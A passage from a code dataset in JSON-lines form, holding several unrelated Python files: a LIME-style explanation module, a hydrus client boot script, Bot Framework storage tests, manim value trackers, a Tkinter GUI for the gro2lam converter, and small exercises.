'forward_selection':\n return self.forward_selection(data, labels, weights, num_features)\n elif method == 'highest_weights':\n clf = Ridge(alpha=0.01, fit_intercept=True,\n random_state=self.random_state)\n clf.fit(data, labels, sample_weight=weights)\n\n coef = clf.coef_\n if sp.sparse.issparse(data):\n coef = sp.sparse.csr_matrix(clf.coef_)\n weighted_data = coef.multiply(data[0])\n # Note: most efficient to slice the data before reversing\n sdata = len(weighted_data.data)\n argsort_data = np.abs(weighted_data.data).argsort()\n # Edge case where data is more sparse than requested number of feature importances\n # In that case, we just pad with zero-valued features\n if sdata < num_features:\n nnz_indexes = argsort_data[::-1]\n indices = weighted_data.indices[nnz_indexes]\n num_to_pad = num_features - sdata\n indices = np.concatenate((indices, np.zeros(num_to_pad, dtype=indices.dtype)))\n indices_set = set(indices)\n pad_counter = 0\n for i in range(data.shape[1]):\n if i not in indices_set:\n indices[pad_counter + sdata] = i\n pad_counter += 1\n if pad_counter >= num_to_pad:\n break\n else:\n nnz_indexes = argsort_data[sdata - num_features:sdata][::-1]\n indices = weighted_data.indices[nnz_indexes]\n return indices\n else:\n weighted_data = coef * data[0]\n feature_weights = sorted(\n zip(range(data.shape[1]), weighted_data),\n key=lambda x: np.abs(x[1]),\n reverse=True)\n return np.array([x[0] for x in feature_weights[:num_features]])\n elif method == 'lasso_path':\n weighted_data = ((data - np.average(data, axis=0, weights=weights))\n * np.sqrt(weights[:, np.newaxis]))\n weighted_labels = ((labels - np.average(labels, weights=weights))\n * np.sqrt(weights))\n nonzero = range(weighted_data.shape[1])\n _, coefs = self.generate_lars_path(weighted_data,\n weighted_labels)\n for i in range(len(coefs.T) - 1, 0, -1):\n nonzero = coefs.T[i].nonzero()[0]\n if len(nonzero) <= num_features:\n break\n used_features = nonzero\n return used_features\n elif method == 'auto':\n if num_features <= 6:\n n_method = 'forward_selection'\n else:\n n_method = 'highest_weights'\n return self.feature_selection(data, labels, weights,\n num_features, n_method)\n\n def explain_instance_with_data(self,\n neighborhood_data,\n neighborhood_labels,\n distances,\n label,\n num_features,\n feature_selection='auto',\n model_regressor=None):\n \"\"\"Takes perturbed data, labels and distances, returns explanation.\n\n Args:\n neighborhood_data: perturbed data, 2d array. first element is\n assumed to be the original data point.\n neighborhood_labels: corresponding perturbed labels. should have as\n many columns as the number of possible labels.\n distances: distances to original data point.\n label: label for which we want an explanation\n num_features: maximum number of features in explanation\n feature_selection: how to select num_features. options are:\n 'forward_selection': iteratively add features to the model.\n This is costly when num_features is high\n 'highest_weights': selects the features that have the highest\n product of absolute weight * original data point when\n learning with all the features\n 'lasso_path': chooses features based on the lasso\n regularization path\n 'none': uses all features, ignores num_features\n 'auto': uses forward_selection if num_features <= 6, and\n 'highest_weights' otherwise.\n model_regressor: sklearn regressor to use in explanation.\n Defaults to Ridge regression if None. Must have\n model_regressor.coef_ and 'sample_weight' as a parameter\n to model_regressor.fit()\n\n Returns:\n (intercept, exp, score, local_pred):\n intercept is a float.\n exp is a sorted list of tuples, where each tuple (x,y) corresponds\n to the feature id (x) and the local weight (y). The list is sorted\n by decreasing absolute value of y.\n score is the R^2 value of the returned explanation\n local_pred is the prediction of the explanation model on the original instance\n \"\"\"\n\n weights = self.kernel_fn(distances)\n labels_column = neighborhood_labels[:, label]\n used_features = self.feature_selection(neighborhood_data,\n labels_column,\n weights,\n num_features,\n feature_selection)\n if model_regressor is None:\n model_regressor = Ridge(alpha=1, fit_intercept=True,\n random_state=self.random_state)\n easy_model = model_regressor\n easy_model.fit(neighborhood_data[:, used_features],\n labels_column, sample_weight=weights)\n prediction_score = easy_model.score(\n neighborhood_data[:, used_features],\n labels_column, sample_weight=weights)\n\n local_pred = easy_model.predict(neighborhood_data[0, used_features].reshape(1, -1))\n\n if self.verbose:\n print('Intercept', easy_model.intercept_)\n print('Prediction_local', local_pred,)\n print('Right:', neighborhood_labels[0, label])\n return (easy_model.intercept_,\n sorted(zip(used_features, easy_model.coef_),\n key=lambda x: np.abs(x[1]), reverse=True),\n prediction_score, local_pred), easy_model\n"} {"ext": "py", "sha": "1a3079fba5ca8725f3811e6010cb2a9c5fb0a486", "content": "# Attempts to verify the solutions of discrete mathematics CW1\n\nimport random\n\ndef listUpTo(num):\n \"\"\"\n Returns a lists of integers from 1 up to num\n \"\"\"\n return list(range(1, num + 1))\n\ndef countMultiples(dividendList, divisor):\n \"\"\"\n Returns the total number of multiples of the divisor in dividendList\n \"\"\"\n multNum = 0\n\n for dividend in dividendList:\n if dividend % divisor == 0:\n multNum += 1\n\n return multNum\n\ndef solveQ1(myList, divisor, selectAmount, n):\n \"\"\"\n Let X denote the number of successful trails in a given n trails.\n\n Selects a 'selectAmount' random elements from 'myList', checks whether it\n is a multiple of 'divisor', performs this for 'n' trails, then returns a\n probability point of X from it's binomial distribution.\n \"\"\"\n\n X = 0\n\n for _ in range(n):\n random.shuffle(myList)\n\n for i, selected in enumerate(myList, start=1):\n\n if i == selectAmount:\n break\n else:\n if selected % divisor == 0:\n X += 1\n\n\n p = X / (len(myList) * n * selectAmount)\n print(p)\n\n\nif __name__ == \"__main__\":\n\n list40 = listUpTo(40)\n # print(list40)\n # print(countMultiples(list40, 4))\n # print()\n\n solveQ1(list40, 4, 2, 10000)\n\n"} {"ext": "py", "sha": "1a307b5b2c019db09d5717c51102eead042c4a44", "content": "#!/usr/bin/env python3\n\n# Hydrus is released under WTFPL\n# You just DO WHAT THE FUCK YOU WANT TO.\n# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md\n\nimport locale\n\ntry: locale.setlocale( locale.LC_ALL, '' )\nexcept: pass\n\ntry:\n \n import os\n import argparse\n import sys\n \n from hydrus.core import HydrusBoot\n \n HydrusBoot.AddBaseDirToEnvPath()\n \n # initialise Qt here, important it is done early\n from hydrus.client.gui import QtPorting as QP\n \n from hydrus.core import HydrusConstants as HC\n from hydrus.core import HydrusData\n from hydrus.core import HydrusGlobals as HG\n from hydrus.core import HydrusLogger\n from hydrus.core import HydrusPaths\n from hydrus.core import HydrusTemp\n \n argparser = argparse.ArgumentParser( description = 'hydrus network client' )\n \n argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )\n argparser.add_argument( '--temp_dir', help = 'override the program\\'s temporary directory' )\n argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )\n argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )\n argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )\n argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )\n argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )\n argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )\n argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )\n argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )\n \n result = argparser.parse_args()\n \n if result.db_dir is None:\n \n db_dir = HC.DEFAULT_DB_DIR\n \n if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:\n \n if HC.USERPATH_DB_DIR is None:\n \n raise Exception( 'The default db path \"{}\" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )\n \n \n db_dir = HC.USERPATH_DB_DIR\n \n \n else:\n \n db_dir = result.db_dir\n \n \n db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )\n \n if not HydrusPaths.DirectoryIsWriteable( db_dir ):\n \n raise Exception( 'The given db path \"{}\" is not a writeable-to!'.format( db_dir ) )\n \n \n try:\n \n HydrusPaths.MakeSureDirectoryExists( db_dir )\n \n except:\n \n raise Exception( 'Could not ensure db path \"{}\" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )\n \n \n if not os.path.isdir( db_dir ):\n \n raise Exception( 'The given db path \"{}\" is not a directory!'.format( db_dir ) )\n \n \n HG.db_journal_mode = result.db_journal_mode\n \n if result.no_wal:\n \n HG.db_journal_mode = 'TRUNCATE'\n \n if result.db_memory_journaling:\n \n HG.db_journal_mode = 'MEMORY'\n \n \n if result.db_cache_size is not None:\n \n HG.db_cache_size = result.db_cache_size\n \n else:\n \n HG.db_cache_size = 256\n \n \n if result.db_transaction_commit_period is not None:\n \n HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )\n \n else:\n \n HG.db_transaction_commit_period = 30\n \n \n if result.db_synchronous_override is not None:\n \n HG.db_synchronous = int( result.db_synchronous_override )\n \n else:\n \n if HG.db_journal_mode == 'WAL':\n \n HG.db_synchronous = 1\n \n else:\n \n HG.db_synchronous = 2\n \n \n \n HG.no_db_temp_files = result.no_db_temp_files\n \n HG.boot_debug = result.boot_debug\n \n try:\n \n from twisted.internet import reactor\n \n except:\n \n HG.twisted_is_broke = True\n \n \nexcept Exception as e:\n \n try:\n \n HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )\n HydrusData.PrintException( e )\n \n except:\n \n pass\n \n \n import traceback\n \n error_trace = traceback.format_exc()\n \n print( error_trace )\n \n if 'db_dir' in locals() and os.path.exists( db_dir ):\n \n emergency_dir = db_dir\n \n else:\n \n emergency_dir = os.path.expanduser( '~' )\n \n possible_desktop = os.path.join( emergency_dir, 'Desktop' )\n \n if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):\n \n emergency_dir = possible_desktop\n \n \n \n dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )\n \n with open( dest_path, 'w', encoding = 'utf-8' ) as f:\n \n f.write( error_trace )\n \n \n print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )\n \n sys.exit( 1 )\n \n\ndef boot():\n \n if result.temp_dir is not None:\n \n HydrusTemp.SetEnvTempDir( result.temp_dir )\n \n \n controller = None\n \n with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:\n \n try:\n \n HydrusData.Print( 'hydrus client started' )\n \n if not HG.twisted_is_broke:\n \n import threading\n \n threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()\n \n \n from hydrus.client import ClientController\n \n controller = ClientController.Controller( db_dir )\n \n controller.Run()\n \n except:\n \n HydrusData.Print( 'hydrus client failed' )\n \n import traceback\n \n HydrusData.Print( traceback.format_exc() )\n \n finally:\n \n HG.started_shutdown = True\n HG.view_shutdown = True\n HG.model_shutdown = True\n \n if controller is not None:\n \n controller.pubimmediate( 'wake_daemons' )\n \n \n if not HG.twisted_is_broke:\n \n reactor.callFromThread( reactor.stop )\n \n \n HydrusData.Print( 'hydrus client shut down' )\n \n \n \n HG.shutdown_complete = True\n \n if HG.restart:\n \n HydrusData.RestartProcess()\n \n \n"} {"ext": "py", "sha": "1a307bf78d17b46f2db7fae4ed5dcc35de8cfc72", "content": "\"\"\"\nCreated on Oct 2, 2012\n\n@author: Georgiana Dinu, Pham The Nghia\n\"\"\"\nfrom composes.similarity.similarity import Similarity\n\n\nclass EuclideanSimilarity(Similarity):\n \"\"\"\n Computes the euclidean similarity of two vectors as the inverse of their\n euclidean distance.\n\n :math:`sim(\\\\vec{u},\\\\vec{v}) = \\\\frac{1}{||\\\\vec{u}-\\\\vec{v}|| + 1}`\n \"\"\"\n\n def _sim(self, v1, v2):\n return 1 / (1 + (v1 - v2).norm())\n"} {"ext": "py", "sha": "1a307d010ca0716f37ddee958c8614c81b2cb53b", "content": "print('-*-' * 15)\nprint('SISTEMA CAIXA ELETRONICO')\nprint('-*-' * 15)\n\nvalor = float(input('Qual será o valor sacado? '))\ncedula = 100\nqtd = 0\ntotal = valor\n\nif valor < 1:\n print('Saque somente acima de R$1! ')\n\nwhile True:\n if valor >= cedula:\n valor = valor - cedula\n qtd += 1\n else:\n if qtd > 0:\n print(F'Total de {qtd} de cedulas de R${cedula}')\n if cedula == 100:\n cedula = 50\n elif cedula == 50:\n cedula = 20\n elif cedula == 20:\n cedula = 10\n elif cedula == 10:\n cedula = 5\n elif cedula == 5:\n cedula = 2\n elif cedula == 2:\n cedula = 1\n qtd = 0\n if total == 0:\n break"} {"ext": "py", "sha": "1a307d336167e10592c72af8e39db3e66623c447", "content": "# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\n\"\"\"\nBase tests that all storage providers should implement in their own tests.\nThey handle the storage-based assertions, internally.\n\nAll tests return true if assertions pass to indicate that the code ran to completion, passing internal assertions.\nTherefore, all tests using theses static tests should strictly check that the method returns true.\n\nNote: Python cannot have dicts with properties with a None value like other SDKs can have properties with null values.\n Because of this, StoreItem tests have \"e_tag: *\" where the tests in the other SDKs do not.\n This has also caused us to comment out some parts of these tests where we assert that \"e_tag\"\n is None for the same reason. A null e_tag should work just like a * e_tag when writing,\n as far as the storage adapters are concerened, so this shouldn't cause issues.\n\n\n:Example:\n async def test_handle_null_keys_when_reading(self):\n await reset()\n\n test_ran = await StorageBaseTests.handle_null_keys_when_reading(get_storage())\n\n assert test_ran\n\"\"\"\nimport pytest\nfrom botbuilder.azure import CosmosDbStorage\nfrom botbuilder.core import (\n ConversationState,\n TurnContext,\n MessageFactory,\n MemoryStorage,\n)\nfrom botbuilder.core.adapters import TestAdapter\nfrom botbuilder.dialogs import (\n DialogSet,\n DialogTurnStatus,\n TextPrompt,\n PromptValidatorContext,\n WaterfallStepContext,\n Dialog,\n WaterfallDialog,\n PromptOptions,\n)\n\n\nclass StorageBaseTests:\n # pylint: disable=pointless-string-statement\n @staticmethod\n async def return_empty_object_when_reading_unknown_key(storage) -> bool:\n result = await storage.read([\"unknown\"])\n\n assert result is not None\n assert len(result) == 0\n\n return True\n\n @staticmethod\n async def handle_null_keys_when_reading(storage) -> bool:\n if isinstance(storage, (CosmosDbStorage, MemoryStorage)):\n result = await storage.read(None)\n assert len(result.keys()) == 0\n # Catch-all\n else:\n with pytest.raises(Exception) as err:\n await storage.read(None)\n assert err.value.args[0] == \"Keys are required when reading\"\n\n return True\n\n @staticmethod\n async def handle_null_keys_when_writing(storage) -> bool:\n with pytest.raises(Exception) as err:\n await storage.write(None)\n assert err.value.args[0] == \"Changes are required when writing\"\n\n return True\n\n @staticmethod\n async def does_not_raise_when_writing_no_items(storage) -> bool:\n # noinspection PyBroadException\n try:\n await storage.write([])\n except:\n pytest.fail(\"Should not raise\")\n\n return True\n\n @staticmethod\n async def create_object(storage) -> bool:\n store_items = {\n \"createPoco\": {\"id\": 1},\n \"createPocoStoreItem\": {\"id\": 2, \"e_tag\": \"*\"},\n }\n\n await storage.write(store_items)\n\n read_store_items = await storage.read(store_items.keys())\n\n assert store_items[\"createPoco\"][\"id\"] == read_store_items[\"createPoco\"][\"id\"]\n assert (\n store_items[\"createPocoStoreItem\"][\"id\"]\n == read_store_items[\"createPocoStoreItem\"][\"id\"]\n )\n\n # If decided to validate e_tag integrity again, uncomment this code\n # assert read_store_items[\"createPoco\"][\"e_tag\"] is not None\n assert read_store_items[\"createPocoStoreItem\"][\"e_tag\"] is not None\n\n return True\n\n @staticmethod\n async def handle_crazy_keys(storage) -> bool:\n key = '!@#$%^&*()_+??><\":QASD~`'\n store_item = {\"id\": 1}\n store_items = {key: store_item}\n\n await storage.write(store_items)\n\n read_store_items = await storage.read(store_items.keys())\n\n assert read_store_items[key] is not None\n assert read_store_items[key][\"id\"] == 1\n\n return True\n\n @staticmethod\n async def update_object(storage) -> bool:\n original_store_items = {\n \"pocoItem\": {\"id\": 1, \"count\": 1},\n \"pocoStoreItem\": {\"id\": 1, \"count\": 1, \"e_tag\": \"*\"},\n }\n\n # 1st write should work\n await storage.write(original_store_items)\n\n loaded_store_items = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n update_poco_item = loaded_store_items[\"pocoItem\"]\n update_poco_item[\"e_tag\"] = None\n update_poco_store_item = loaded_store_items[\"pocoStoreItem\"]\n assert update_poco_store_item[\"e_tag\"] is not None\n\n # 2nd write should work\n update_poco_item[\"count\"] += 1\n update_poco_store_item[\"count\"] += 1\n\n await storage.write(loaded_store_items)\n\n reloaded_store_items = await storage.read(loaded_store_items.keys())\n\n reloaded_update_poco_item = reloaded_store_items[\"pocoItem\"]\n reloaded_update_poco_store_item = reloaded_store_items[\"pocoStoreItem\"]\n\n assert reloaded_update_poco_item[\"count\"] == 2\n assert reloaded_update_poco_store_item[\"count\"] == 2\n\n # Write with old e_tag should succeed for non-storeItem\n update_poco_item[\"count\"] = 123\n await storage.write({\"pocoItem\": update_poco_item})\n\n # Write with old eTag should FAIL for storeItem\n update_poco_store_item[\"count\"] = 123\n\n \"\"\"\n This assert exists in the other SDKs but can't in python, currently\n due to using \"e_tag: *\" above (see comment near the top of this file for details).\n\n with pytest.raises(Exception) as err:\n await storage.write({\"pocoStoreItem\": update_poco_store_item})\n assert err.value is not None\n \"\"\"\n\n reloaded_store_items2 = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n reloaded_poco_item2 = reloaded_store_items2[\"pocoItem\"]\n reloaded_poco_item2[\"e_tag\"] = None\n reloaded_poco_store_item2 = reloaded_store_items2[\"pocoStoreItem\"]\n\n assert reloaded_poco_item2[\"count\"] == 123\n assert reloaded_poco_store_item2[\"count\"] == 2\n\n # write with wildcard etag should work\n reloaded_poco_item2[\"count\"] = 100\n reloaded_poco_store_item2[\"count\"] = 100\n reloaded_poco_store_item2[\"e_tag\"] = \"*\"\n\n wildcard_etag_dict = {\n \"pocoItem\": reloaded_poco_item2,\n \"pocoStoreItem\": reloaded_poco_store_item2,\n }\n\n await storage.write(wildcard_etag_dict)\n\n reloaded_store_items3 = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n assert reloaded_store_items3[\"pocoItem\"][\"count\"] == 100\n assert reloaded_store_items3[\"pocoStoreItem\"][\"count\"] == 100\n\n # Write with empty etag should not work\n reloaded_store_items4 = await storage.read([\"pocoStoreItem\"])\n reloaded_store_item4 = reloaded_store_items4[\"pocoStoreItem\"]\n\n assert reloaded_store_item4 is not None\n\n reloaded_store_item4[\"e_tag\"] = \"\"\n dict2 = {\"pocoStoreItem\": reloaded_store_item4}\n\n with pytest.raises(Exception) as err:\n await storage.write(dict2)\n assert err.value is not None\n\n final_store_items = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n assert final_store_items[\"pocoItem\"][\"count\"] == 100\n assert final_store_items[\"pocoStoreItem\"][\"count\"] == 100\n\n return True\n\n @staticmethod\n async def delete_object(storage) -> bool:\n store_items = {\"delete1\": {\"id\": 1, \"count\": 1, \"e_tag\": \"*\"}}\n\n await storage.write(store_items)\n\n read_store_items = await storage.read([\"delete1\"])\n\n assert read_store_items[\"delete1\"][\"e_tag\"]\n assert read_store_items[\"delete1\"][\"count\"] == 1\n\n await storage.delete([\"delete1\"])\n\n reloaded_store_items = await storage.read([\"delete1\"])\n\n assert reloaded_store_items.get(\"delete1\", None) is None\n\n return True\n\n @staticmethod\n async def delete_unknown_object(storage) -> bool:\n # noinspection PyBroadException\n try:\n await storage.delete([\"unknown_key\"])\n except:\n pytest.fail(\"Should not raise\")\n\n return True\n\n @staticmethod\n async def perform_batch_operations(storage) -> bool:\n await storage.write(\n {\"batch1\": {\"count\": 10}, \"batch2\": {\"count\": 20}, \"batch3\": {\"count\": 30},}\n )\n\n result = await storage.read([\"batch1\", \"batch2\", \"batch3\"])\n\n assert result.get(\"batch1\", None) is not None\n assert result.get(\"batch2\", None) is not None\n assert result.get(\"batch3\", None) is not None\n assert result[\"batch1\"][\"count\"] == 10\n assert result[\"batch2\"][\"count\"] == 20\n assert result[\"batch3\"][\"count\"] == 30\n \"\"\"\n If decided to validate e_tag integrity aagain, uncomment this code\n assert result[\"batch1\"].get(\"e_tag\", None) is not None\n assert result[\"batch2\"].get(\"e_tag\", None) is not None\n assert result[\"batch3\"].get(\"e_tag\", None) is not None\n \"\"\"\n\n await storage.delete([\"batch1\", \"batch2\", \"batch3\"])\n\n result = await storage.read([\"batch1\", \"batch2\", \"batch3\"])\n\n assert result.get(\"batch1\", None) is None\n assert result.get(\"batch2\", None) is None\n assert result.get(\"batch3\", None) is None\n\n return True\n\n @staticmethod\n async def proceeds_through_waterfall(storage) -> bool:\n convo_state = ConversationState(storage)\n\n dialog_state = convo_state.create_property(\"dialogState\")\n dialogs = DialogSet(dialog_state)\n\n async def exec_test(turn_context: TurnContext) -> None:\n dialog_context = await dialogs.create_context(turn_context)\n\n await dialog_context.continue_dialog()\n if not turn_context.responded:\n await dialog_context.begin_dialog(WaterfallDialog.__name__)\n await convo_state.save_changes(turn_context)\n\n adapter = TestAdapter(exec_test)\n\n async def prompt_validator(prompt_context: PromptValidatorContext):\n result = prompt_context.recognized.value\n if len(result) > 3:\n succeeded_message = MessageFactory.text(\n f\"You got it at the {prompt_context.options.number_of_attempts}rd try!\"\n )\n await prompt_context.context.send_activity(succeeded_message)\n return True\n\n reply = MessageFactory.text(\n f\"Please send a name that is longer than 3 characters. {prompt_context.options.number_of_attempts}\"\n )\n await prompt_context.context.send_activity(reply)\n return False\n\n async def step_1(step_context: WaterfallStepContext) -> DialogTurnStatus:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.context.send_activity(\"step1\")\n return Dialog.end_of_turn\n\n async def step_2(step_context: WaterfallStepContext) -> None:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.prompt(\n TextPrompt.__name__,\n PromptOptions(prompt=MessageFactory.text(\"Please type your name\")),\n )\n\n async def step_3(step_context: WaterfallStepContext) -> DialogTurnStatus:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.context.send_activity(\"step3\")\n return Dialog.end_of_turn\n\n steps = [step_1, step_2, step_3]\n\n dialogs.add(WaterfallDialog(WaterfallDialog.__name__, steps))\n\n dialogs.add(TextPrompt(TextPrompt.__name__, prompt_validator))\n\n step1 = await adapter.send(\"hello\")\n step2 = await step1.assert_reply(\"step1\")\n step3 = await step2.send(\"hello\")\n step4 = await step3.assert_reply(\"Please type your name\") # None\n step5 = await step4.send(\"hi\")\n step6 = await step5.assert_reply(\n \"Please send a name that is longer than 3 characters. 0\"\n )\n step7 = await step6.send(\"hi\")\n step8 = await step7.assert_reply(\n \"Please send a name that is longer than 3 characters. 1\"\n )\n step9 = await step8.send(\"hi\")\n step10 = await step9.assert_reply(\n \"Please send a name that is longer than 3 characters. 2\"\n )\n step11 = await step10.send(\"Kyle\")\n step12 = await step11.assert_reply(\"You got it at the 3rd try!\")\n await step12.assert_reply(\"step3\")\n\n return True\n"} {"ext": "py", "sha": "1a307dec7a41e764ad9211995da38d2730e41557", "content": "import numpy as np\nfrom manimlib.mobject.mobject import Mobject\n\n\nclass ValueTracker(Mobject):\n \"\"\"\n Note meant to be displayed. Instead the position encodes some\n number, often one which another animation or continual_animation\n uses for its update function, and by treating it as a mobject it can\n still be animated and manipulated just like anything else.\n \"\"\"\n\n def __init__(self, value=0, **kwargs):\n Mobject.__init__(self, **kwargs)\n self.points = np.zeros((1, 3))\n self.set_value(value)\n\n def get_value(self):\n return self.points[0, 0]\n\n def set_value(self, value):\n self.points[0, 0] = value\n return self\n\n def increment_value(self, d_value):\n self.set_value(self.get_value() + d_value)\n\n\nclass ExponentialValueTracker(ValueTracker):\n \"\"\"\n Operates just like ValueTracker, except it encodes the value as the\n exponential of a position coordinate, which changes how interpolation\n behaves\n \"\"\"\n\n def get_value(self):\n return np.exp(ValueTracker.get_value(self))\n\n def set_value(self, value):\n return ValueTracker.set_value(self, np.log(value))\n\n\nclass ComplexValueTracker(ValueTracker):\n def get_value(self):\n return complex(*self.points[0, :2])\n\n def set_value(self, z):\n z = complex(z)\n self.points[0, :2] = (z.real, z.imag)\n return self\n"} {"ext": "py", "sha": "1a3081112dd6341e71ab42275305611cea2b5b08", "content": "#!/usr/bin/python\n# By Hernan Chavez Thielemann\n__author__ = 'Hernan Chavez Thielemann '\n# checked ok 30/04/2018 \n\n#------------------------------------------------------\n#/// Packages and globals definitions are here ///\n#------------------------------------------------------\nfrom os.path import dirname, realpath\nfrom sys import exit\n\nfrom Tkinter import Tk, Frame, Label, TclError, PhotoImage\n\nfrom conversion_gui import Conversion\nfrom script_gui import Script_GUI\nfrom run_gui import Run_GUI\n\nfrom popup import AboutPopUp\nfrom tk_lib import createmenubar\n\nfrom lib.misc.warn import wrg_3\nfrom lib.misc.file import run_command\nfrom lib.misc.version import __version__\n\n#------------------------------------------------------\n'''/////////////// Class /////////////'''\n#------------------------------------------------------\n\nclass Gro2Lam_GUI(Frame):\n ''' Graphic User Interface '''\n def __init__(self, master=None, test = False):\n Frame.__init__(self, master)\n _ver= __version__.split()\n self.master.title(\" \"*5+\"{} {}\".format(_ver[0],_ver[2]))#.master\n \n self.pack() # ... why I'm packing here?? coords?\n self.test = test\n \n # images storaging\n dir_path = dirname( realpath( __file__))\n self.img = dict()\n self.img['logo'] = PhotoImage( file = dir_path + \"/img/logo.ppm\")\n self.img['help'] = PhotoImage( file = dir_path + \"/img/help.ppm\")\n self.img['file'] = PhotoImage( file = dir_path + \"/img/file.ppm\")\n self.img['gear'] = PhotoImage( file = dir_path + \"/img/gear.ppm\")\n \n # body init\n self.prevailing_body = 0\n self.body = None\n self.MAINVERTEX = [ 0, 0, 0, 0, 0, 0]\n \n # Conversion gathered data container\n self._convert_ = {'setup' : [], 'solvation': []}\n self._convertdata_= None\n # Script part\n self._script_ = {'mainpage' : [], 'advanced': [], 'restrain': []}\n \n self.createmainPennon()\n \n\n def createmainPennon(self):\n '''Self explanatory neated with subroutines to make it more readable'''\n \n row = Frame(self,bg = \"white\")\n Label( row, bg = \"white\",\n image = self.img['logo']).pack( side= 'left', padx=25)\n row.pack(side=\"top\", fill='x', padx=1)\n \n self.swapbody(1)\n\n def swapbody(self, _pbody_):# checked ok 16/09 -----------WF\n ''' Deletes and clean the last generated body\n maybe lacks a real body destroyer?? but works fine with\n this, because it is just a \"small\" overlapping I gess\n '''\n \n if self.prevailing_body <> _pbody_:\n if self.body == None:\n self.body = self.create_conversion_gui()\n \n else:\n self.body.destroy()\n \n if _pbody_==1:\n print 'Swapping to gro2lam converter GUI'\n self.body = self.create_conversion_gui()\n \n elif _pbody_==2:\n print 'Swapping to input script generator GUI'\n self.body = self.create_script_gui()\n \n elif _pbody_==3:\n print 'Swapping to run script GUI'\n self.body = self.create_run_gui()\n \n else:\n exit('Wuut...')\n \n self.prevailing_body = _pbody_\n \n self.body.createWidgets()\n self.body.b1.focus()\n self.master.bind('', self.b1_hook )\n self.master.bind('', self.quit_hook )\n self.body.pack(side='top', fill='x')\n\n def b1_hook(self, event=None):\n self.body.b1.invoke()\n \n def quit_hook(self, event=None):\n self.body.quit()\n \n def swap_hook(self):\n _l_ = [1,2,3]\n b = _l_[_l_.index(self.prevailing_body)-2]\n self.swapbody(b)\n \n def create_conversion_gui(self):\n 'Hook to create conversion gui'\n return Conversion(self)# Hook\n \n def create_script_gui(self):\n 'Hook to create script gui'\n return Script_GUI(self)# Hook\n \n def create_run_gui(self):\n 'Hook to create run gui'\n return Run_GUI(self)# Hook\n\n#------------------------------------------------------\n'''/////////////// Sub routines /////////////'''\n#------------------------------------------------------\n\ndef launch_gui( started = False):\n ''' launcher \n Main GUI constructor\n '''\n \n print wrg_3('Before you start, make sure there are no comments',\n '(;) in the middle of a line of the input GROMACS files.',\n 'Data after this symbol are not taken into account.')\n \n MasterWin = Tk()\n prompt = Gro2Lam_GUI( master= MasterWin, test = started)# xl_App\n \n # Top main pennon menu bar definition\n \n entry_list_of_dicts = [{ 'title' : 'File',\n 'cascade' : (('Quit' ,MasterWin.quit), ) },\n { 'title' : 'Data File Creation',\n 'title_com' : (prompt.swapbody , 1)},\n { 'title' : 'Input File Creation',\n 'title_com' : (prompt.swapbody , 2)},\n { 'title' : 'Run',\n 'title_com' : (prompt.swapbody , 3)},\n { 'titlei' : prompt.img['help'], \n 'cascade' : (('User manual' , showuserman),\n ('About' , launch_about, prompt),)}\n ]\n createmenubar(MasterWin, entry_list_of_dicts)\n \n w = 460\n h = 570\n # get screen width and height\n ws = MasterWin.winfo_screenwidth() # width of the screen\n hs = MasterWin.winfo_screenheight() # height of the screen\n # calculate x and y coordinates for the Tk root window\n x = (ws/6) - (w/2)\n if x <100:\n x = 100\n y = (hs/3) - (h/2)\n if y< 40:\n y = 40\n \n prompt.MAINVERTEX = [ws, hs, w, h, x, y]\n #print MAINVERTEX\n # set the dimensions of the screen \n # and where it is placed\n MasterWin.geometry('{:d}x{:d}+{:d}+{:d}'.format( *prompt.MAINVERTEX[2:]))\n \n \n prompt.mainloop()\n \n try:\n MasterWin.destroy()\n except TclError:\n pass\n\ndef showlicence():\n \n print 'Opening licence file'\n command = 'gedit ./lib/docs/COPYING'#\n run_command(command)\n\ndef launch_about( _master_window_):\n \n print 'Launching about'\n \n title_txt = ' '*17+'ABOUT GROTOLAM'\n \n pop = AboutPopUp(master = _master_window_,\n title = title_txt,\n licence = showlicence\n )\n\ndef showuserman():\n \n print 'Opening readme file'\n command = 'gedit ./lib/docs/README.md'#\n run_command(command)\n\n# vim:tw=80\n"} {"ext": "py", "sha": "1a308167840becc98449ea5d7c892e04e39b37c3", "content": "\"\"\"\nPhong Material\n\nFor phong shading\n\"\"\"\nfrom .material import Material\nfrom ..math import Vec3, Ray, HitRecord, dot3, reflect3, normalize3, clamp3\nfrom ..camera import Camera\n\n\nclass PhongMaterial(Material):\n\n \"\"\"Base Material Class\"\"\"\n\n def __init__(self, color: Vec3 = 